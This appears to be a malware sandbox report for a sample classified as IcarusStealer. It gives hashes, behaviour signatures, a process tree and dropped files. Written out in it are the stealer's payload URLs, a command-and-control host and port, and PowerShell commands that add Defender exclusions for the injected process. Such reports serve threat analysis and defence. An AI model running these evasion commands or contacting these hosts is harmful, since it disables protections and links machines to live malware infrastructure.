Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

switched_1.exe

windows10-1703-x64

10

switched_1.exe

windows10-2004-x64

10

switched_1.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    305s
  • max time network
    280s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/03/2024, 01:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    switched_1.exe

  • Size

    3.7MB

  • MD5

    b9bbe31d276de5c3d05352d070ae4244

  • SHA1

    5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

  • SHA256

    a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

  • SHA512

    0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

  • SSDEEP

    49152:tYDJ4w53qs7fg442ZvkOlVdP8iFoh/dYINv7sq8:e4u3cV/gHP8X1hNv7

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\switched_1.exe
    "C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3200
    • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
      "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5052
        • C:\Windows\system32\certutil.exe
          certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
          4⤵
            PID:1124
          • C:\Windows\system32\find.exe
            find /i /v "md5"
            4⤵
              PID:3544
            • C:\Windows\system32\find.exe
              find /i /v "certutil"
              4⤵
                PID:1992
          • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
            "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1944
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ykek5io\5ykek5io.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:928
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDD7293FA7CA414392B1E4C2824845C4.TMP"
                4⤵
                  PID:336
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                3⤵
                • Modifies Installed Components in the registry
                • Enumerates connected drives
                • Checks SCSI registry key(s)
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:4792
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                3⤵
                  PID:1376
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4736
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:8
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2392
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1304
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3728
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:712
                  • C:\Users\Admin\AppData\Local\Temp\Start.exe
                    C:\Users\Admin\AppData\Local\Temp\Start.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2512
            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:4840

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d0c46cad6c0778401e21910bd6b56b70

              SHA1

              7be418951ea96326aca445b8dfe449b2bfa0dca6

              SHA256

              9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

              SHA512

              057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              16KB

              MD5

              ecf218b885977bf38c724818bedb9bb2

              SHA1

              54bc0bf35aca4ceedeebe4c509edb7d1475195bc

              SHA256

              0216df2557c2eb44e0072d0f25a3eb8452de7044d0ddfd793137bc39f8639db0

              SHA512

              db37f77d0870d6edc3187fc286ff713443649231497b6691839a6e64f63f51022cccbd4fa4954077a20b2969abac9c91bc9ad70a9ce924be9f0911f88d2e5311

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES7F6C.tmp
              Filesize

              1KB

              MD5

              20ea380b065d32251b35a40e6949de05

              SHA1

              468d3056e8533144ee595209ae097ec734d4ddce

              SHA256

              014538f919a32bb521072fbff179eaf25777d49ce6569ef219232ef5ef40815c

              SHA512

              4183d83ba34a033cc166e7415ed928c4d69a395f39dc09cbf11e82badc05f6957b9ef05dbeeade58ecb2864e6c75057d37df390e1bd0b7cc834031df5f0f5de2

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Start.exe
              Filesize

              4KB

              MD5

              94469f47805644e9d8934a4b701230a4

              SHA1

              543c046891593bc8062b1dc624e644b4dd88a37a

              SHA256

              e65311fc504e351ed78073aa53a2323eb6b8cad4da02b73a63e70d5f793262fc

              SHA512

              c92487b1a931c76c95f9e4058a1ff82b2b94e34d0228973b01b62c46670dc1fe78163c366c414cdd7c761570bcade3dd4c46dd848eed6b0d6aa38769aa15ea81

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51msrgcu.vic.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
              Filesize

              3.1MB

              MD5

              b1d3b6f7673bd8572d9519468a6a2d6c

              SHA1

              61b907e4abdf29b77c5da751150f4172163f0a04

              SHA256

              e78cbf2e8d31f6140a7e7afdadd6d96a6c5475fd9149c7b920edfb8b889b42a9

              SHA512

              9d1de488e44e347c7816b7a568401564f1e80c0aadf679d6bac22413c9e4d0efedce0e565a27cc80e95858abdbd84923c062144783cb3dd9bb1a11dd2ac2e959

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
              Filesize

              1.3MB

              MD5

              114a5b42a9af4054633548f4dae79440

              SHA1

              6e87d6a6421dee93079a99ee868a8a895e06dc03

              SHA256

              87f551eb7e7f273c3ed1e49b1b7f6b439cb7931791ac29672ab2e12eead7dff9

              SHA512

              cc621962841f5aeb19c0185de84d74dd07f1c12f3608ead3e622c4b3a00dba182515afc18bc5a326b9670924969007fabe9aa07e279b9c50ac996ba8f765b37a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
              Filesize

              512KB

              MD5

              1d6971f39da6e971f9e46c96b9a8d9b8

              SHA1

              16a5d4467408d29c14b18a46d85609ef0d92002b

              SHA256

              b1a31dd9f5aa46ff1dfb939a277e8d4c8924c07d5fa6b15d2806954840b7ec15

              SHA512

              0e7df5dfa15e22d1e75efa4edc4ac1396d0636cd592917aec108fe515b4af61495d9a30833ce5b5caf221f55798f54d43529bbe8d60ad5f94f4a98f434e44a6e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
              Filesize

              494KB

              MD5

              0f0838bc6642dd6bc603368e50b4aba3

              SHA1

              932bd4d1c11996bf8ac3ac74a94b266e96d44c36

              SHA256

              4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

              SHA512

              a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
              Filesize

              96KB

              MD5

              4b5c145bd247b71cc6cfc09a82e78ddb

              SHA1

              8f229d3bf6c4302ca2704f321c1df7116ddff4d1

              SHA256

              8a3eebc46071d5eeec0ff2fab8e3531b1f83a8d036077d8ffbeb25ed1482260d

              SHA512

              4c9e0e71aa8ea9aa173aa89064329c530e3062e6a661680e964df4e162375ea1899fe0936cbea07c6c6d4b45253998615434d594e394fd2479752547dd3ff124

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\5ykek5io\5ykek5io.0.cs
              Filesize

              1KB

              MD5

              14846c9faaef9299a1bf17730f20e4e6

              SHA1

              8083da995cfaa0e8e469780e32fcff1747850eb6

              SHA256

              61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

              SHA512

              549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\5ykek5io\5ykek5io.cmdline
              Filesize

              447B

              MD5

              bb1ed7d03b678a11b79922f5db9f5400

              SHA1

              6e2fb5fafe53262545c21b5f6a60253d514ce98e

              SHA256

              0ddd660ceac366d733a7c1ec1a6f54766d7d15e773ff259a6957993b07f6536b

              SHA512

              109304c0cf3f6e18c6f72b06869b601c1c7e205aa2b3404c9e36e77da861fd5fb8898fce6bf4ab5a73ab457efc760f4637ff4e4f2ccec2cfcab864f3ce92e2f6

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\CSCDDD7293FA7CA414392B1E4C2824845C4.TMP
              Filesize

              1KB

              MD5

              810535a8ae563d6aa53635a1bb1206ff

              SHA1

              f5ba39f1a455eb61efe5022b524892249ee75dce

              SHA256

              7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

              SHA512

              5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

              Download Submit

            • memory/1928-24-0x00007FF7EC270000-0x00007FF7EC6AC000-memory.dmp

              Filesize

              4.2MB

              Download

            • memory/1928-18-0x00007FF7EC270000-0x00007FF7EC6AC000-memory.dmp

              Filesize

              4.2MB

              Download

            • memory/1944-26-0x0000000007450000-0x00000000079F6000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/1944-25-0x0000000005A80000-0x0000000005A90000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1944-29-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/1944-23-0x0000000005830000-0x00000000058C2000-memory.dmp

              Filesize

              584KB

              Download

            • memory/1944-22-0x0000000005790000-0x000000000582C000-memory.dmp

              Filesize

              624KB

              Download

            • memory/1944-21-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/1944-20-0x0000000000DF0000-0x0000000000E72000-memory.dmp

              Filesize

              520KB

              Download

            • memory/1944-44-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/2392-63-0x0000000005C30000-0x0000000005C52000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2392-88-0x0000000002E10000-0x0000000002E20000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2392-53-0x0000000005530000-0x0000000005B5A000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/2392-127-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/2392-120-0x0000000007950000-0x0000000007958000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2392-55-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/2392-56-0x0000000002E10000-0x0000000002E20000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2392-118-0x00000000062F0000-0x0000000006305000-memory.dmp

              Filesize

              84KB

              Download

            • memory/2392-117-0x0000000007940000-0x000000000794E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2392-116-0x0000000007900000-0x0000000007911000-memory.dmp

              Filesize

              68KB

              Download

            • memory/2392-115-0x0000000007970000-0x0000000007A06000-memory.dmp

              Filesize

              600KB

              Download

            • memory/2392-65-0x0000000005DC0000-0x0000000005E26000-memory.dmp

              Filesize

              408KB

              Download

            • memory/2392-113-0x00000000076F0000-0x000000000770A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/2392-103-0x00000000075A0000-0x0000000007644000-memory.dmp

              Filesize

              656KB

              Download

            • memory/2392-80-0x0000000005F10000-0x0000000005F2E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/2392-101-0x0000000007530000-0x000000000754E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/2392-92-0x000000006FCF0000-0x000000006FD3C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/2392-91-0x0000000007550000-0x0000000007584000-memory.dmp

              Filesize

              208KB

              Download

            • memory/2392-87-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/2512-69-0x0000000002E00000-0x0000000002E10000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2512-84-0x00007FFBEA9C0000-0x00007FFBEB482000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2512-50-0x0000000000B80000-0x0000000000B88000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2512-52-0x00007FFBEA9C0000-0x00007FFBEB482000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2512-90-0x0000000002E00000-0x0000000002E10000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3728-83-0x0000000005AE0000-0x0000000005B2C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/3728-51-0x0000000004540000-0x0000000004576000-memory.dmp

              Filesize

              216KB

              Download

            • memory/3728-102-0x000000006FCF0000-0x000000006FD3C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/3728-54-0x00000000045D0000-0x00000000045E0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3728-70-0x0000000005530000-0x0000000005887000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/3728-112-0x0000000007440000-0x0000000007ABA000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/3728-86-0x00000000045D0000-0x00000000045E0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3728-114-0x0000000006E20000-0x0000000006E2A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/3728-64-0x00000000053E0000-0x0000000005446000-memory.dmp

              Filesize

              408KB

              Download

            • memory/3728-123-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3728-89-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3728-57-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3728-119-0x0000000007110000-0x000000000712A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4736-82-0x0000000005880000-0x0000000005890000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4736-41-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4736-40-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

              Download

            • memory/4736-42-0x0000000005880000-0x0000000005890000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4736-81-0x0000000074C30000-0x00000000753E1000-memory.dmp

              Filesize

              7.7MB

              Download